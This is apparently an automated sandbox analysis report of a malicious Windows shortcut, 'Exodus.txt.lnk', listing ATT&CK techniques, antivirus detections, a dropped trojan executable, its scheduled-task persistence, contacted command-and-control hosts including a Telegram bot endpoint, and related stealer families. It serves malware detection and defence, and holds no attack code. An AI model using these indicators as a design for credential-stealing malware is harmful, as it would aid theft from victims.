Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	351 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	11 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	161 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	161 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Exodus.txt.lnk	55%	ReversingLabs	Shortcut.Trojan.WinLnk
Exodus.txt.lnk	56%	Virustotal		Browse
Exodus.txt.lnk	100%	Avira	LNK/Dropper.VPOO
Exodus.txt.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\tmp1201676045.exe	100%	Avira	HEUR/AGEN.1313362
C:\Users\user\AppData\Local\Temp\tmp1201676045.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tmp1201676045.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Source	Detection	Scanner	Label
https://www.themakersmob.com/register/resend	0%	Avira URL Cloud	safe
https://todoenartes.com/register	0%	Avira URL Cloud	safe
https://www.vova.com/es/login.php	0%	Avira URL Cloud	safe
http://www.woodsmithvideotips.com/home	0%	Avira URL Cloud	safe
https://www.miclaroapp.com.co/	0%	Avira URL Cloud	safe
http://128.199.113.162	0%	Avira URL Cloud	safe
http://www.woodsmithlibrary.com/login/	0%	Avira URL Cloud	safe
file:///C:/Users/user/AppData/Local/Temp/p.html	0%	Avira URL Cloud	safe
https://webmail.telmex.net.co/app/s/LoginPage.asp	0%	Avira URL Cloud	safe
https://resultados.lch.com.co/ingresar	0%	Avira URL Cloud	safe
https://www.woodsmithlibrary.com/account/password/reset/complete/	0%	Avira URL Cloud	safe
https://portal.vectric.com/register/9W7jITU6QgSBfrIhb_0UOw	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	142.250.186.132	true	false	high
api.mylnikov.org	104.21.44.66	true	false	high
api.telegram.org	149.154.167.220	true	false	high
icanhazip.com	104.16.185.241	true	false	high
246.229.1.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://icanhazip.com/	false		high
file:///C:/Users/user/AppData/Local/Temp/p.html	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.vova.com/es/login.php	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://wieistmeineip.de	sets.json.7.dr	false		high
https://mercadoshops.com.co	sets.json.7.dr	false		high
https://mercadolivre.com	sets.json.7.dr	false		high
https://www.pinterest.es/	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false		high
http://www.woodsmithvideotips.com/home	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://easylist.to/)	LICENSE.txt.7.dr	false		high
https://medonet.pl	sets.json.7.dr	false		high
https://mercadoshops.com.br	sets.json.7.dr	false		high
https://johndeere.com	sets.json.7.dr	false		high
https://todoenartes.com/register	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://www.themakersmob.com/register/resend	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://baomoi.com	sets.json.7.dr	false		high
https://elfinancierocr.com	sets.json.7.dr	false		high
https://bolasport.com	sets.json.7.dr	false		high
https://desimartini.com	sets.json.7.dr	false		high
https://hearty.app	sets.json.7.dr	false		high
https://mercadoshops.com	sets.json.7.dr	false		high
https://nlc.hu	sets.json.7.dr	false		high
https://p106.net	sets.json.7.dr	false		high
https://radio2.be	sets.json.7.dr	false		high
https://songshare.com	sets.json.7.dr	false		high
https://smaker.pl	sets.json.7.dr	false		high
http://128.199.113.162	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416F09000.00000004.00000800.00020000.00000000.sdmp, tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416D63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://p24.hu	sets.json.7.dr	false		high
https://24.hu	sets.json.7.dr	false		high
https://mightytext.net	sets.json.7.dr	false		high
https://hazipatika.com	sets.json.7.dr	false		high
https://joyreactor.com	sets.json.7.dr	false		high
http://crl.ver)	svchost.exe, 0000000C.00000002.3314009438.000001D9C3800000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wildixin.com	sets.json.7.dr	false		high
https://eworkbookcloud.com	sets.json.7.dr	false		high
https://chennien.com	sets.json.7.dr	false		high
https://www.ecosia.org/newtab/	tmp1201676045.exe, 00000004.00000002.2330412278.000001F7100CC000.00000004.00000800.00020000.00000000.sdmp, tmp57B1.tmp.dat.4.dr, tmp717B.tmp.dat.4.dr	false		high
https://www.paypal.com/webapps/hermes	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false		high
https://drimer.travel	sets.json.7.dr	false		high
http://www.instructables.com/id/DIY-Chess-Board/	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false		high
https://mercadopago.cl	sets.json.7.dr	false		high
https://naukri.com	sets.json.7.dr	false		high
https://interia.pl	sets.json.7.dr	false		high
https://bonvivir.com	sets.json.7.dr	false		high
https://sapo.io	sets.json.7.dr	false		high
https://wpext.pl	sets.json.7.dr	false		high
https://welt.de	sets.json.7.dr	false		high
https://poalim.site	sets.json.7.dr	false		high
https://drimer.io	sets.json.7.dr	false		high
https://infoedgeindia.com	sets.json.7.dr	false		high
https://blackrockadvisorelite.it	sets.json.7.dr	false		high
https://cognitive-ai.ru	sets.json.7.dr	false		high
http://api.telegram.org	tmp1201676045.exe, 00000004.00000002.2290707674.000001F7006E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cafemedia.com	sets.json.7.dr	false		high
https://graziadaily.co.uk	sets.json.7.dr	false		high
https://thirdspace.org.au	sets.json.7.dr	false		high
https://mercadoshops.com.ar	sets.json.7.dr	false		high
https://www.amazon.com/ap/forgotpassword	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false		high
https://commentcamarche.com	sets.json.7.dr	false		high
https://rws3nvtvt.com	sets.json.7.dr	false		high
https://www.miclaroapp.com.co/	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://mercadolivre.com.br	sets.json.7.dr	false		high
https://clmbtech.com	sets.json.7.dr	false		high
https://salemovefinancial.com	sets.json.7.dr	false		high
https://mercadopago.com.br	sets.json.7.dr	false		high
https://commentcamarche.net	sets.json.7.dr	false		high
https://hj.rs	sets.json.7.dr	false		high
https://hearty.me	sets.json.7.dr	false		high
https://mercadolibre.com.gt	sets.json.7.dr	false		high
https://indiatodayne.in	sets.json.7.dr	false		high
https://idbs-staging.com	sets.json.7.dr	false		high
https://mercadolibre.co.cr	sets.json.7.dr	false		high
https://prisjakt.no	sets.json.7.dr	false		high
https://kompas.com	sets.json.7.dr	false		high
https://wingify.com	sets.json.7.dr	false		high
https://player.pl	sets.json.7.dr	false		high
https://webmail.telmex.net.co/app/s/LoginPage.asp	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.ar	sets.json.7.dr	false		high
https://mercadolibre.com.hn	sets.json.7.dr	false		high
https://tucarro.com.co	sets.json.7.dr	false		high
https://een.be	sets.json.7.dr	false		high
https://terazgotuje.pl	sets.json.7.dr	false		high
https://www.banggood.com/login.html	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false		high
https://g.live.com/odclientsettings/Prod/C:	edb.log.12.dr	false		high
http://www.woodsmithlibrary.com/login/	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://intoday.in	sets.json.7.dr	false		high
https://resultados.lch.com.co/ingresar	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://carcostadvisor.com	sets.json.7.dr	false		high
https://mercadopago.com.co	sets.json.7.dr	false		high
https://caracoltv.com	sets.json.7.dr	false		high
https://mercadolibre.com	sets.json.7.dr	false		high
https://mittanbud.no	sets.json.7.dr	false		high
https://www.woodsmithlibrary.com/account/password/reset/complete/	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	tmp1201676045.exe, 00000004.00000002.2290707674.000001F7006B3000.00000004.00000800.00020000.00000000.sdmp, tmp1201676045.exe, 00000004.00000002.2290707674.000001F700001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://startlap.hu	sets.json.7.dr	false		high
https://portal.vectric.com/register/9W7jITU6QgSBfrIhb_0UOw	tmp1201676045.exe, 0000000E.00000002.2348507412.0000022416FD7000.00000004.00000800.00020000.00000000.sdmp, p.html.4.dr	false	Avira URL Cloud: safe	unknown
https://dewarmsteweek.be	sets.json.7.dr	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 0000000C.00000003.2143835501.000001D9C35A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.dr	false		high
https://cricbuzz.com	sets.json.7.dr	false		high
https://elpais.com.uy	sets.json.7.dr	false		high
https://mercadolibre.com.uy	sets.json.7.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.44.66	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
128.199.113.162	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589032
Start date and time:	2025-01-11 08:40:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Exodus.txt.lnk
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winLNK@70/166@8/8
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.110, 66.102.1.84, 172.217.23.110, 216.58.206.78, 216.58.206.46, 2.23.242.162, 2.22.50.131, 192.229.221.95, 142.250.186.78, 172.217.16.206, 142.250.185.238, 34.104.35.123, 142.250.185.78, 142.250.186.46, 199.232.210.172, 142.250.186.174, 142.250.184.206, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa
Execution Graph export aborted for target powershell.exe, PID 6176 because it is empty
Execution Graph export aborted for target tmp1201676045.exe, PID 7696 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:41:40	API Interceptor	16x Sleep call for process: powershell.exe modified
02:41:47	API Interceptor	111x Sleep call for process: tmp1201676045.exe modified
02:41:48	API Interceptor	2x Sleep call for process: svchost.exe modified
08:41:48	Task Scheduler	Run new task: WinTask path: C:\Users\user\AppData\Local\Temp\tmp1201676045.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.44.66	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse
149.154.167.220	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
128.199.113.162	HTZ4az17lj.exe	Get hash	malicious	StormKitty	Browse	128.199.113.162/XtfcshEgt/upwawsfrg.php
128.199.113.162	chrome.exe	Get hash	malicious	Metasploit	Browse	128.199.113.162/upwawsfrg.php
239.255.255.250	Yv24LkKBY6.exe	Get hash	malicious	Unknown	Browse
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse
	https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNX	Get hash	malicious	Unknown	Browse
	https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330	Get hash	malicious	Unknown	Browse
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse
	http://www.jadavisinjurylawyers.com/	Get hash	malicious	Unknown	Browse
	http://txto.eu.org/	Get hash	malicious	Unknown	Browse
	https://noiclethomas.wixsite.com/rice	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	172.67.196.114
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	172.67.196.114
	d29z3fwo37.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
api.telegram.org	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
icanhazip.com	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	104.16.185.241
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	bPkG0wTVon.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	itLDZwgFNE.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.184.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	dhPWt112uC.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z6tNjJC614.exe	Get hash	malicious	FormBook	Browse	104.21.42.77
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
DIGITALOCEAN-ASNUS	6.elf	Get hash	malicious	Unknown	Browse	157.245.133.81
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	174.138.88.129
	https://probashkontho.com/work/Organization/privacy/index_.html	Get hash	malicious	Unknown	Browse	188.166.2.160
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	142.93.62.161
	Setup.exe	Get hash	malicious	Unknown	Browse	159.203.177.96
	Setup.exe	Get hash	malicious	Unknown	Browse	161.35.127.181
	Setup.exe	Get hash	malicious	Unknown	Browse	161.35.127.181
	https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t	Get hash	malicious	Unknown	Browse	165.22.210.101
	http://www.jmclmedia.ph	Get hash	malicious	Unknown	Browse	206.189.225.178
	5.elf	Get hash	malicious	Unknown	Browse	157.245.182.61

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	dhPWt112uC.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.44.66 149.154.167.220
	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	104.21.44.66 149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.9064549735133199
Encrypted:	false
SSDEEP:	3072:gJjJGtpTq2yv1AuNZRY3diu8iBVqFtZLpTGLpBLpmNCBNJN:hpezNZQd58iGLpTGLpBLp
MD5:	1A066C51045803B4B41F7809C2486E3E
SHA1:	D4A30942321194A5457841A13BE6AAB54A37988E
SHA-256:	1201652438FC66D6F3E29738E65E1DF014453EC75EB6E7BAE748A99D3E76AF52
SHA-512:	F8A0C03E7961935B430125D1671C987C7BCAE3A7DE2265D427198724E0FDA0BB2662FDC37D5F0821C1FC022C4EAB2587EA1938C21E6C07E3888B6ED563435561
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Input	Output
